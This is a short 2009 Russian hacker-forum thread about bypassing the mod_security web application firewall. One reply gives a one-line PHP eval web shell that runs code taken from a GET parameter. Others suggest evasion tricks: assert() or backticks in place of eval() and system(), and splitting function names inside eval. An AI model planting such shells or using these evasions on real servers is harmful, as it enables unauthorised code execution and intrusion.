как обойти mod_security?

Discussion in 'Песочница' started by guestXXXXX, 24 Sep 2009.

  1. guestXXXXX

    guestXXXXX Banned

    Joined:
    26 Jul 2008
    Messages:
    65
    Likes Received:
    50
    Reputations:
    3
    del.

    del.
     
    #1 guestXXXXX, 24 Sep 2009
    Last edited: 22 Apr 2011
  2. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    <?eval(stripslashes($_GET[lol]));?>
     
    #2 Pashkela, 24 Sep 2009
    Last edited: 24 Sep 2009
  3. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Дать ссылку в личку и не рассказывать сказки

    ЗЫЖ

    а вообще, все по русски написано:

    POST to /my-buggy-script.php not supported.

    купи словарь, я сначала подумал, что ты шелл уже льешь
     
    #3 Pashkela, 24 Sep 2009
    Last edited: 24 Sep 2009
  4. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    ок
     
  5. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    mod_security это если очень просто - набор фильтров и правила, по которым сервер реагирует на то, что прописано в правилах.

    Поэтому ответ на сабж - ХЗ. Всё зависит от того, что прописано в фильтрах
    Чмоки тебя в счоки. Не забывай про нас, продолжай вносить минуты радости в суровые хакерские будни :)
     
  6. [Raz0r]

    [Raz0r] Elder - Старейшина

    Joined:
    25 Feb 2007
    Messages:
    425
    Likes Received:
    484
    Reputations:
    295
    Набор базовых правил mod_security можно обойти различными альтернативными конструкциями. Если для SQL-инъекций не так много вариантов, то для PHP-injection можно придумать массу: например, assert() вместо eval(), `cmd` вместо system() и т.д.
     
    1 person likes this.
  7. diehard

    diehard Elder - Старейшина

    Joined:
    30 Sep 2007
    Messages:
    442
    Likes Received:
    266
    Reputations:
    15
    у меня было фильтровалось "fwrite()", помогла замена: function foawrite($f,$st){eval("fwr"."ite($f,$st);");} :)
     
    1 person likes this.
Loading...